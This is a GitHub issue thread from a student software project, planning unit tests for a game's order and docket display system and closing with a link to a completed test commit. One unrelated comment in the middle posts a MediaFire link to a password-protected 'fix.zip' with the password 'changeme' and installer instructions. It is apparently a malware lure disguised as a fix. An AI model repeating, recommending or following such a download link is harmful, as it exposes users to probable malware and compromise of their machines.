### ISSUE TITLE
TEST CASES #TEAM 4

### ISSUE THREAD

**Issue by LAKSHAYATREJA** [UQcsse3200/2024-studio-3#74]
# **Description**
TASK : Test cases for Order system(#3).
FEATURE : Order System(#4)

Implementing the test cases which will cover all the components that are there under order system from displaying an order to the all the way to closing the ticket . It will eliminate errors in the code and will assure the proper functioning of the code towards the team’s feature.
 
## **Example (optional)**
Test case on displaying ticket : It will test  the data is displayed and also make sure that the ticket is closed after the timer.
Test case for status :It will make sure that the status is displayed and can be changed. 

DEPENDENCIES
List any tasks on which this ticket relies. If there is already an existing ticket, reference it using #xx. If a task needs to be implemented, and the issue does not already exist, make a new ticket and leave it unassigned for someone else to take on. Ensure other team members are aware of the issue.
- [x] Dependency 1 : The quality of code written .
- [x] Dependency 2 : Does the code fulfil the purpose for the task it is written .

# **Milestones**
List of steps that need to be completed for this task.

- [x] Test on Docket Display (Aug. 25)
- [x] Test on Docket Display (aug 26)
- [x] Test for Docket Display Line(Aug.27)
- [x] Create test plan

 
**Completion Deadline:** Aug. 29
# **MEMBER**
- Lakshay(LAKSHAYATREJA) (Lakshay)

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LAKSHAYATREJA** [comment]
completed initial test on docket Game Unit Tests #265: Commit [554412f](https://github.com/UQcsse3200/2024-studio-3/commit/554412fc22c74027d50a268d34e48b674883c061) pushed by [LAKSHAYATREJA](https://github.com/LAKSHAYATREJA)
